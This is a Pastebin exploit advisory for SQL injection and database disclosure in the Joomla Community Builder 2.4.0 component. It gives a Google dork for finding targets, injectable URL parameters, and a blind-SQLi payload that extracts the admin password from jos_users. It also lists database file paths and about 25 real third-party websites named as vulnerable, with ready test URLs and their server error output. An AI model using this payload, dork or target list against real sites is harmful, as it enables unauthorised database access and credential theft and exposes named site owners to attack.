Advertisement
KingSkrupellos

Joomla ComProfiler Community Builder 2.4.0 Multiple Vuln

Feb 3rd, 2019
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.11 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ComProfiler Community Builder Components 2.4.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/02/2019
  7. # Vendor Homepage : joomlapolis.com
  8. # Software Download Link : joomlapolis.com/downloads
  9. # Software Information Link : extensions.joomla.org/extension/community-builder/
  10. # Software Version : 2.4.0
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_comprofiler''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. CWE-200 [ Information Exposure ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Community Builder ComProfiler is an extremely flexible and robust social networking solution for Joomla.
  27.  
  28. ####################################################################
  29.  
  30. # Impact :
  31. ***********
  32.  
  33. * Joomla ComProfiler Community Builder 2.4.0 component for Joomla is prone to an
  34.  
  35. SQL-injection vulnerability because it fails to sufficiently sanitize
  36.  
  37. user-supplied data before using it in an SQL query.
  38.  
  39. Exploiting this issue could allow an attacker to compromise the application,
  40.  
  41. access or modify data, or exploit latent vulnerabilities in the underlying database.
  42.  
  43. A remote attacker can send a specially crafted request to the vulnerable application
  44.  
  45. and execute arbitrary SQL commands in application`s database.
  46.  
  47. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  48.  
  49. An attacker can exploit this issue using a browser.
  50.  
  51. * This Software prone to an information exposure/database disclosure vulnerability.
  52.  
  53. Successful exploits of this issue may allow an attacker to obtain sensitive
  54.  
  55. information by downloading the full contents of the application's database.
  56.  
  57. * Any remote user may download the database files and gain access
  58.  
  59. to sensitive information including unencrypted authentication credentials.
  60.  
  61. ####################################################################
  62.  
  63. # SQL Injection Exploit :
  64. **********************
  65.  
  66. /index.php?option=com_comprofiler&task=[SQL Injection]
  67.  
  68. /index.php?option=com_comprofiler&task=usersList&Itemid=[SQL Injection]
  69.  
  70. /index.php?option=com_comprofiler&task=userProfile&user=[SQL Injection]
  71.  
  72. /index.php?option=com_comprofiler&view=login&Itemid=[SQL Injection]
  73.  
  74. /index.php?option=com_comprofiler&task=userProfile&user=[ID-NUMBER]&Itemid=[SQL Injection]
  75.  
  76. /index.php?option=com_comprofiler&task=usersList&listid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  77.  
  78. /index.php?option=com_comprofiler&task=pluginclass&plugin=cb.facebookconnect&action=facebookconnect&func=session&Itemid=&format=[SQL Injection]
  79.  
  80. /index.php?option=com_comprofiler&task=fieldclass&function=checkvalue&user=[ID-NUMBER]&reason=register&format=raw&field=[SQL Injection]
  81.  
  82. # Example Exploit Payload :
  83. ************************
  84. /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid
  85. ((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
  86.  
  87. # Database Disclosure Exploit :
  88. **************************
  89. /administrator/components/com_comprofiler/install.comprofiler.sql
  90. /administrator/components/com_comprofiler/database/database.cbcore.xml
  91.  
  92. ####################################################################
  93.  
  94. # Example Vulnerable Sites :
  95. *************************
  96.  
  97. [+] demaitere.fr/joomla1.6.1/administrator/components
  98. /com_comprofiler/install.comprofiler.sql
  99.  
  100. [+] medicine-bg.net/index.php?option=com_comprofiler&task=1%27
  101.  
  102. [+] ia.pw.edu.pl/~openm3/index.php?option=
  103. com_comprofiler&task=usersList&Itemid=41%27
  104.  
  105. [+] africaplaces.com/index.php?option=com_comprofiler&task=1%27
  106.  
  107. [+] press.100promotion.net/index.php?option=com_comprofiler&task=1%27
  108.  
  109. [+] cobur.nl/vp/nl/index.php?option=
  110. com_comprofiler&task=userProfile&user=4131%27
  111.  
  112. [+] lastanza.tempodelsogno.com/joomla/index.php?option=
  113. com_comprofiler&task=1%27
  114.  
  115. [+] estudiocadoche.com/index.php?option=com_comprofiler&task=
  116. userslist&Itemid=81%27
  117.  
  118. [+] peisagistica.usamv.ro/index.php?option=com_comprofiler&task=
  119. userProfile&user=111&Itemid=156%27
  120.  
  121. [+] educaciononline.edu.ec/index.php?option=com_comprofiler&task=
  122. pluginclass&plugin=cb.facebookconnect&action=facebookconnect
  123. &func=session&Itemid=&format=1%27
  124.  
  125. [+] delftgenclik.nl/nl/index.php?option=com_comprofiler&task=
  126. usersList&listid=4&Itemid=59&limitstart=340%27
  127.  
  128. [+] unreal.moonliteshadow.org/index.php?option=com_comprofiler&task=1%27
  129.  
  130. [+] beliebtsein.de/index.php?option=com_comprofiler&Itemid=73%27
  131.  
  132. [+] islah-net.net/index.php?option=com_comprofiler&task=1%27
  133.  
  134. [+] weblearningtools.org/wltres-j15/index.php?option=
  135. com_comprofiler&task=fieldclass&function=
  136. checkvalue&user=0&reason=register&format=raw&field=1%27
  137.  
  138. [+] new.ecla-handball.org/index.php?option=com_comprofiler&task=1%27
  139.  
  140. [+] qualityoflifelearning.com/index.php?option=com_comprofiler&task=%27
  141.  
  142. [+] missaocristabr.org/index.php?option=com_comprofiler&task=1%27
  143.  
  144. [+] wlcklub.hu/index.php?option=com_comprofiler&task=1%27
  145.  
  146. [+] eventvermittlung.at/index.php?option=com_comprofiler&task=1%27
  147.  
  148. [+] davidpeake.com/index.php?option=com_comprofiler&task=1%27
  149.  
  150. [+] vlcom.dk/index.php?option=com_comprofiler&task=1%27
  151.  
  152. [+] abi99gymbo.de/index.php?option=com_comprofiler&task=1%27
  153.  
  154. [+] riogrande4x4.com.br/index.php?option=com_comprofiler
  155. &task=userProfile&user=63&Itemid=71%27
  156.  
  157. ####################################################################
  158.  
  159. # Example SQL Database Error :
  160. ****************************
  161. Deprecated: Assigning the return value of new by reference is
  162. deprecated in /home/openm3/.homepage/includes/joomla.php on line 844
  163.  
  164. Warning: Cannot modify header information - headers already
  165. sent by (output started at /home/openm3/.homepage
  166. /includes/joomla.php:844) in /home/openm3/.homepage
  167. /includes/joomla.php on line 697
  168.  
  169. Warning: call_user_func_array() expects parameter 2
  170. to be array, string given in /home2/francis6/public_html/vw
  171. /administrator/components/com_comprofiler
  172. /plugin.foundation.php on line 1484
  173.  
  174. Strict Standards: Non-static method JLoader::import() should
  175. not be called statically in /home/100promotion.net
  176. /press.100promotion.net/libraries/joomla/import.php on line 29
  177.  
  178. Fatal error: Uncaught Error: Call to undefined function
  179. set_magic_quotes_runtime() in /customers/8/e/1/vlcom.dk
  180. /httpd.www/includes/framework.php:21 Stack trace: #0 /customers
  181. /8/e/1/vlcom.dk/httpd.www/index.php(22): require_once() #1
  182. {main} thrown in /customers/8/e/1/vlcom.dk
  183. /httpd.www/includes/framework.php on line 21
  184.  
  185. ####################################################################
  186.  
  187. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  188.  
  189. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement